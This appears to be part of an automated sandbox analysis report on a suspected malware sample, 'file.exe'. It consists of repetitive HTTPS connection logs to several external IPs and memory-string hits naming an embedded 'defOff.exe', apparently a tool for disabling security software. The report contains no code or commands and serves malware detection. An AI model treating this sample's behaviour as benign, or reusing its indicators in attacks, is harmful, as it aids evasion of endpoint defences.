              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
              Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
              Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
              Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
              Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
              Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
              Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
              Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
              Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
              Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
              Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
              Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
              Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
              Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
              Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
              Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
              Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
              Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
              Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
              Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
              Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
              Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
              Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
              Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
              Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
              Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
              Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
              Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
              Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
              Source: unknownHTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 184.30.17.174:443 -> 192.168.2.4:49762 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 184.30.17.174:443 -> 192.168.2.4:49763 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49824 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.4:49830 version: TLS 1.2

              System Summary

              barindex
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exe, 00000000.00000003.1955885905.00000000060EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1960432581.0000000006124000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1951568643.00000000060AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1955162126.00000000060E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1982227273.00000000064EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1950043583.0000000005C63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1952175162.0000000006011000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1961160669.0000000006127000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1965190633.0000000006274000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1960038474.0000000006006000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1956153697.00000000060E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1955273532.000000000600E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1955499593.000000000600C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1957101233.00000000060F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1981043382.0000000005B8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1956854082.00000000060FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1954019599.0000000006003000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1952394646.0000000006008000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1981931335.0000000001252000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1959438813.000000000612B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1954247371.000000000619F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1954849713.00000000061B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1957589325.000000000610D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1981557380.0000000005B76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1951978439.00000000060AB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1955040352.000000000600F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1956714589.0000000006006000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1966546233.0000000006004000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1953701805.00000000060CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1955742679.000000000600B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1958461893.0000000006119000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1957786279.000000000600E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1965520699.0000000006006000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1981510757.0000000001267000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1958075531.000000000620F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1951661068.0000000006002000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1952606393.0000000006004000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1960884910.0000000006258000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1957378231.0000000006010000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1954365744.000000000600F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1966337884.000000000628C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1959751592.0000000006115000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1954735968.00000000060D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1967109603.0000000006009000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1952923412.00000000060BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1958307175.0000000006011000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1963189818.0000000006004000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1959278821.0000000006011000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1950148090.0000000006008000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1953472079.000000000617D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1951775646.00000000060A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1954490183.00000000060D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1956434394.000000000600B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1961479959.000000000600F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1952280944.00000000060C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1959892940.0000000006231000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1949665746.0000000005C62000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1954128023.00000000060CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1956014005.0000000006006000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1955614020.00000000060E4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1966921593.0000000006284000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1952512021.00000000060B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1951420333.000000000600C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1985743541.0000000006002000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1981794068.0000000005B66000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1952074087.000000000615D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1957935235.0000000006109000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
